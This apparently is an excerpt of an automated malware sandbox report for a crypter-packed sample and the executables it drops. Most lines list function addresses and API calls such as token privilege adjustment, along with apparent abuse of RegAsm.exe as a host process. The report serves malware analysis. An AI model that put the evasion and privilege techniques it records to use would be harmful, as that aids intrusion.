Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00419354 NtQueryDefaultLocale,	15_2_00419354
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00419389 NtQueryDefaultLocale,	15_2_00419389
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0041B41F NtQueryDefaultLocale,ExitProcess,	15_2_0041B41F
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0041A66B NtQueryDefaultLocale,ExitProcess,	15_2_0041A66B
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0041A60F NtQueryDefaultLocale,ExitProcess,	15_2_0041A60F
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00419739 NtQueryDefaultLocale,	15_2_00419739
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0041A854 NtQueryDefaultLocale,ExitProcess,	15_2_0041A854
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0041A897 NtQueryDefaultLocale,ExitProcess,	15_2_0041A897
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0041A93C NtQueryDefaultLocale,ExitProcess,	15_2_0041A93C
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00419ABE NtQueryDefaultLocale,	15_2_00419ABE
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00418CB1 NtQueryDefaultLocale,	15_2_00418CB1
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00419DF2 NtQueryDefaultLocale,	15_2_00419DF2
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0041AD8D NtQueryDefaultLocale,ExitProcess,	15_2_0041AD8D

Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe

Code function: 8_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

8_2_00409448

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Code function: 0_2_04E15DF1	0_2_04E15DF1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Code function: 0_2_04C36630	0_2_04C36630
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Code function: 0_2_04C32240	0_2_04C32240
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Code function: 0_2_04C35EFA	0_2_04C35EFA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Code function: 0_2_04C30848	0_2_04C30848
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Code function: 0_2_04C3C56C	0_2_04C3C56C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Code function: 0_2_04C38F4F	0_2_04C38F4F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Code function: 0_2_04C38F60	0_2_04C38F60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Code function: 0_2_04C30839	0_2_04C30839
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00427210	2_2_00427210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00481580	2_2_00481580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042C670	2_2_0042C670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004366C0	2_2_004366C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0046D6E0	2_2_0046D6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00430740	2_2_00430740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00451720	2_2_00451720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004317E0	2_2_004317E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00442970	2_2_00442970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047EB60	2_2_0047EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00437B10	2_2_00437B10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00434B20	2_2_00434B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00509BD0	2_2_00509BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00433BE0	2_2_00433BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00434D40	2_2_00434D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004CEF10	2_2_004CEF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00440F20	2_2_00440F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004210E0	2_2_004210E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00402100	2_2_00402100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004242B0	2_2_004242B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004213A0	2_2_004213A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00423470	2_2_00423470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00441480	2_2_00441480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042D570	2_2_0042D570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00517515	2_2_00517515
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040B5E0	2_2_0040B5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0056359F	2_2_0056359F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0054E59A	2_2_0054E59A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00405640	2_2_00405640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00422640	2_2_00422640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042A660	2_2_0042A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00402630	2_2_00402630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_005446D9	2_2_005446D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00443750	2_2_00443750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00517710	2_2_00517710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00513720	2_2_00513720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00424730	2_2_00424730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00421820	2_2_00421820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041E9E0	2_2_0041E9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00562983	2_2_00562983
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0044ABA0	2_2_0044ABA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00425CA0	2_2_00425CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042CD50	2_2_0042CD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00550D68	2_2_00550D68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042DD20	2_2_0042DD20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00543D30	2_2_00543D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00552DA0	2_2_00552DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00567E9D	2_2_00567E9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00401E90	2_2_00401E90
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Code function: 5_2_01406958	5_2_01406958
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Code function: 5_2_01401908	5_2_01401908
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Code function: 5_2_014018FA	5_2_014018FA
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Code function: 5_2_01401688	5_2_01401688
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Code function: 5_2_01401698	5_2_01401698
Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe	Code function: 8_2_0040840C	8_2_0040840C
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Code function: 9_1_004144C9	9_1_004144C9
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Code function: 9_1_0040779F	9_1_0040779F
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Code function: 10_2_01750870	10_2_01750870
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Code function: 10_2_01750878	10_2_01750878
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Code function: 10_2_0175033D	10_2_0175033D
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Code function: 10_2_0175850C	10_2_0175850C
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Code function: 10_2_05A45FC4	10_2_05A45FC4
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Code function: 10_2_05A42FDC	10_2_05A42FDC
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Code function: 12_2_026BE00C	12_2_026BE00C
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Code function: 13_2_00D70BEF	13_2_00D70BEF
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0041B16F	15_2_0041B16F
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_004199E9	15_2_004199E9
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00416B2C	15_2_00416B2C
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0040A04B	15_2_0040A04B
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00409009	15_2_00409009
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00409037	15_2_00409037
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0040A0D0	15_2_0040A0D0
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_004090E6	15_2_004090E6
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_004090EF	15_2_004090EF
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0040D085	15_2_0040D085
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0040A0BB	15_2_0040A0BB
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0040A168	15_2_0040A168
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00409172	15_2_00409172
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00409109	15_2_00409109
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0040A11F	15_2_0040A11F
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_004071CC	15_2_004071CC
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_004171DD	15_2_004171DD
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_004061F2	15_2_004061F2
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_004071A5	15_2_004071A5
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0040A24A	15_2_0040A24A
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00409254	15_2_00409254
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0040825A	15_2_0040825A
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00409201	15_2_00409201
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00406226	15_2_00406226
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0040A23D	15_2_0040A23D
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_004062D8	15_2_004062D8
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0040A296	15_2_0040A296
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00408299	15_2_00408299
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_004072B2	15_2_004072B2
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0041B347	15_2_0041B347
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00419354	15_2_00419354
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0040A374	15_2_0040A374
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00409316	15_2_00409316
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00406320	15_2_00406320
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00406321	15_2_00406321
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_004063C4	15_2_004063C4
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_004093D8	15_2_004093D8
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0040838B	15_2_0040838B
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_004063AB	15_2_004063AB
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_004063B8	15_2_004063B8
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0040940A	15_2_0040940A
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0041B41F	15_2_0041B41F
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0040942F	15_2_0040942F
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00408568	15_2_00408568
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_004095DE	15_2_004095DE
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_004215E5	15_2_004215E5
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00409647	15_2_00409647
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0041A66B	15_2_0041A66B
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0041A60F	15_2_0041A60F
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00405627	15_2_00405627
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00408632	15_2_00408632
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0041B6D8	15_2_0041B6D8
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_004096DC	15_2_004096DC
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_004096E1	15_2_004096E1
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00416696	15_2_00416696
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_004086A7	15_2_004086A7
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0040976E	15_2_0040976E
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00409776	15_2_00409776
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0040870C	15_2_0040870C
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_004087C1	15_2_004087C1
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0040D7CD	15_2_0040D7CD
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0040D7E7	15_2_0040D7E7
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0040D7F2	15_2_0040D7F2
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0040D7FB	15_2_0040D7FB
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00409845	15_2_00409845
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0041A854	15_2_0041A854
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0040986A	15_2_0040986A
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0041781F	15_2_0041781F
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_004098C5	15_2_004098C5
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_004098FB	15_2_004098FB
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0041A897	15_2_0041A897
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00407945	15_2_00407945
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00416901	15_2_00416901
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00416918	15_2_00416918
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0041A93C	15_2_0041A93C
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_004099AA	15_2_004099AA
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00407A66	15_2_00407A66
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00416A03	15_2_00416A03
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00409A04	15_2_00409A04
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00416A19	15_2_00416A19
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00409A32	15_2_00409A32
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00409A3B	15_2_00409A3B
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00409ADE	15_2_00409ADE
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00407A81	15_2_00407A81
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00416B64	15_2_00416B64
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00407B24	15_2_00407B24
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00407B33	15_2_00407B33
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00409BC3	15_2_00409BC3
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00407BC8	15_2_00407BC8
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00409BE8	15_2_00409BE8
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00409B91	15_2_00409B91
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00407B95	15_2_00407B95
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00407BB5	15_2_00407BB5
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0040BBB6	15_2_0040BBB6
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00417C01	15_2_00417C01
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0040BC80	15_2_0040BC80
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00418CB1	15_2_00418CB1
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0041AD8D	15_2_0041AD8D
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00409E7E	15_2_00409E7E
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00416E18	15_2_00416E18
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00406EFD	15_2_00406EFD
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0040DE86	15_2_0040DE86
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00409EA3	15_2_00409EA3
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00416F64	15_2_00416F64
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00416F75	15_2_00416F75
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00416F0D	15_2_00416F0D
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00409F15	15_2_00409F15
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00416FCA	15_2_00416FCA
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00416FDB	15_2_00416FDB
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00416FEA	15_2_00416FEA
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00405FF1	15_2_00405FF1
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00416F86	15_2_00416F86
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00416F97	15_2_00416F97
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00416FA8	15_2_00416FA8
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00405FB5	15_2_00405FB5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process token adjusted: Security

Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: String function: 00502A87 appears 39 times
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: String function: 004FEDB6 appears 70 times
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: String function: 005029F6 appears 99 times
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: String function: 00502A53 appears 375 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0053F880 appears 39 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004172E0 appears 53 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7888 -ip 7888

